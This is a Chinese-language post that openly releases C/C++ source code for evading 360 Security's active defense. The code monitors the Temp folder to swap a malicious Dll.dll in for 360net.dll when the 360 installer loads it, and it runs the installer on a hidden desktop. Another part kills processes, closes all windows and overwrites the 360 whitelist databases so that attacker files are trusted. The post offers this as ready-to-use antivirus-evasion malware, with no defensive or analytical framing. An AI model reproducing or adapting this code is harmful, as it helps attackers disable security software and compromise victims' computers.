免杀360过主动防御加入白名单代码放出

HINSTANCE hInstance = NULL; DWORD WINAPI MainBacak(LPVOID lpParameter) { SetPriorityClass( GetCurrentProcess(), HIGH_PRIORITY_CLASS ); char MydirPath[MAX_PATH]; SHGetSpecialFolderPath(NULL,MydirPath,CSIDL_PROFILE,0); CHAR MyDir[MAX_PATH]; wsprintf(MyDir,"%s\\Local Settings\\Temp\\",MydirPath); const int buf_size = 1024; CHAR buf[buf_size]; DWORD dwBufWrittenSize; HANDLE hDir; hDir = CreateFile(MyDir, FILE_LIST_DIRECTORY,FILE_SHARE_READ|FILE_SHARE_DELETE,NULL,OPEN_EXISTING,FILE_FLAG_BACKUP_SEMANTICS, NULL); if (hDir == INVALID_HANDLE_VALUE) { CloseHandle(hDir); exit(0); } while(1) { if(ReadDirectoryChangesW(hDir, &buf, buf_size, TRUE , FILE_NOTIFY_CHANGE_FILE_NAME| FILE_NOTIFY_CHANGE_DIR_NAME| FILE_NOTIFY_CHANGE_ATTRIBUTES| FILE_NOTIFY_CHANGE_SIZE| FILE_NOTIFY_CHANGE_LAST_WRITE| FILE_NOTIFY_CHANGE_LAST_ACCESS| FILE_NOTIFY_CHANGE_CREATION| FILE_NOTIFY_CHANGE_SECURITY, &dwBufWrittenSize, NULL, NULL)) { FILE_NOTIFY_INFORMATION * pfiNotifyInfo = (FILE_NOTIFY_INFORMATION*)buf; char* pszMultiByte; pszMultiByte = new char[512]; ZeroMemory( pszMultiByte, 512); WideCharToMultiByte(CP_ACP, 0,pfiNotifyInfo->FileName, pfiNotifyInfo->FileNameLength/2, pszMultiByte, 512, NULL, NULL); char *p; p=strstr(pszMultiByte,"360net.dll"); if(p!=NULL) { char tmp360net[MAX_PATH]={0}; lstrcpy(tmp360net,pszMultiByte); switch(pfiNotifyInfo->Action) { case FILE_ACTION_ADDED: delete []pszMultiByte; break; case FILE_ACTION_REMOVED: delete []pszMultiByte; break; case FILE_ACTION_MODIFIED: lstrcat(MyDir,tmp360net); if (CopyFile("Dll.dll",MyDir,FALSE)!=0) { delete []pszMultiByte; CloseHandle(hDir); return 1; } else { delete []pszMultiByte; return 0; break; } default: break; } } } } CloseHandle(hDir); return 0; } DWORD WINAPI MainDesk(LPVOID lpParameter) { HDESK hDesk = CreateDesktop("Virtual", NULL, NULL, DF_ALLOWOTHERACCOUNTHOOK, DESKTOP_CREATEWINDOW| DESKTOP_ENUMERATE| DESKTOP_READOBJECTS| DESKTOP_WRITEOBJECTS| DESKTOP_HOOKCONTROL , NULL ); STARTUPINFO si = {sizeof(si)}; si.lpDesktop = "Virtual"; si.dwFlags = STARTF_USESHOWWINDOW; si.wShowWindow = SW_HIDE; PROCESS_INFORMATION pi = {0}; if(!CreateProcess(NULL,(LPSTR)(LPCSTR)lpParameter, NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi)) { CloseHandle(pi.hThread); CloseHandle(pi.hProcess); CloseDesktop(hDesk); return 0; } return 1; } int main(int argc, char* argv[]) { char safe[MAX_PATH]; HKEY hkey; DWORD type = REG_SZ; DWORD buffSize=sizeof(safe); if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\App Paths\\360safe.exe",NULL,KEY_READ,&hkey)==ERROR_SUCCESS) { RegQueryValueEx(hkey,"Path",NULL,&type,(LPBYTE)safe,&buffSize); RegCloseKey(hkey); } else { if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,"SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\App Paths\\360safe.exe",NULL,KEY_READ,&hkey)==ERROR_SUCCESS) { RegQueryValueEx(hkey,"Path",NULL,&type,(LPBYTE)safe,&buffSize); RegCloseKey(hkey); } } char tmp360safe[MAX_PATH]={0}; lstrcpy(tmp360safe,safe); lstrcat(tmp360safe,"\\modules\\360Inst.exe"); char MyDir[MAX_PATH]; SHGetSpecialFolderPath(NULL,MyDir,CSIDL_PROFILE,0); strcat(MyDir,"\\Local Settings\\Temp\\"); MessageBox(NULL,MyDir,NULL,NULL); ExitProcess(0); if (access(tmp360safe,0)==0) { while(1) { HANDLE handle[2]; handle[1]=CreateThread(NULL,NULL,MainBacak,NULL,CREATE_SUSPENDED,NULL); SetThreadPriority(handle[1],THREAD_PRIORITY_HIGHEST); ResumeThread(handle[1]); handle[2]=CreateThread(NULL,NULL,MainDesk,tmp360safe,CREATE_SUSPENDED,NULL); SetThreadPriority(handle[2],THREAD_PRIORITY_LOWEST); ResumeThread(handle[2]); WaitForSingleObject(handle[2],INFINITE); DWORD lpExitCode2; GetExitCodeThread(handle[2],&lpExitCode2); if (lpExitCode2==0) { CloseHandle(handle[2]); CloseHandle(handle[1]); continue; } WaitForSingleObject(handle[1],INFINITE); DWORD lpExitCode; GetExitCodeThread(handle[1],&lpExitCode); if (lpExitCode==1) { CloseHandle(handle[1]); CloseHandle(handle[2]); Sleep(15000); } else { CloseHandle(handle[1]); CloseHandle(handle[2]); } } } return 0; } 替换白名单数据库部分: int Storm(int count) { unsigned long Time=GetTickCount(); int seed=rand()+3; seed=(seed*Time)%count; return seed; } BOOL CALLBACK EnumWindowsProc(HWND hwnd,LPARAM IParam)//回调函数 { PostMessage(hwnd, WM_CLOSE, 0, 0); return TRUE; } extern "C" __declspec(dllexport)void HttpCreateDownloadObj() { char taskkill[MAX_PATH]; wsprintf(taskkill,"taskkill /im load.exe /f"); WinExec(taskkill,SW_HIDE); EnumWindows(EnumWindowsProc,0); char safe[MAX_PATH]; char SD[MAX_PATH]; HKEY hkey; DWORD type = REG_SZ; DWORD buffSize=sizeof(safe); DWORD buffSize1=sizeof(SD); if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\App Paths\\360safe.exe",NULL,KEY_READ,&hkey)==ERROR_SUCCESS) { RegQueryValueEx(hkey,"Path",NULL,&type,(LPBYTE)safe,&buffSize); RegCloseKey(hkey); } else { if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,"SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\App Paths\\360safe.exe",NULL,KEY_READ,&hkey)==ERROR_SUCCESS) { RegQueryValueEx(hkey,"Path",NULL,&type,(LPBYTE)safe,&buffSize); RegCloseKey(hkey); } } if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\App Paths\\360sd.exe",NULL,KEY_READ,&hkey)==ERROR_SUCCESS) { RegQueryValueEx(hkey,"Path",NULL,&type,(LPBYTE)SD,&buffSize1); RegCloseKey(hkey); } else { if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,"SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\App Paths\\360sd.exe",NULL,KEY_READ,&hkey)==ERROR_SUCCESS) { RegQueryValueEx(hkey,"Path",NULL,&type,(LPBYTE)SD,&buffSize1); RegCloseKey(hkey); } } char tmp360safe[MAX_PATH]={0}; lstrcpy(tmp360safe,safe); lstrcat(tmp360safe,"\\modules\\360Inst.exe"); char MydirPath[MAX_PATH]; SHGetSpecialFolderPath(NULL,MydirPath,CSIDL_PROFILE,0); CHAR MyDir[MAX_PATH]; wsprintf(MyDir,"%s\\Local Settings\\Temp\\",MydirPath); CHAR speedmem[MAX_PATH]; wsprintf(speedmem,"%s\\sp%cedm%cm.hg",MyDir,'a'+Storm(26),'a'+Storm(26)); CHAR slD[MAX_PATH]; wsprintf(slD,"%s\\s%cefmm%c.ds",MyDir,'a'+Storm(26),'a'+Storm(26)); speedmemSaveFile(speedmem); sdSaveFile(slD); CHAR Newspeedmem[MAX_PATH]; wsprintf(Newspeedmem,"%s\\deepscan\\speedmem2.hg",safe); CHAR NewslD[MAX_PATH]; wsprintf(NewslD,"%s\\sl2.db",SD); DeleteFile(Newspeedmem); DeleteFile(NewslD); CopyFile(speedmem,Newspeedmem,FALSE); CopyFile(slD,NewslD,FALSE); DeleteFile(speedmem); DeleteFile(slD); return; }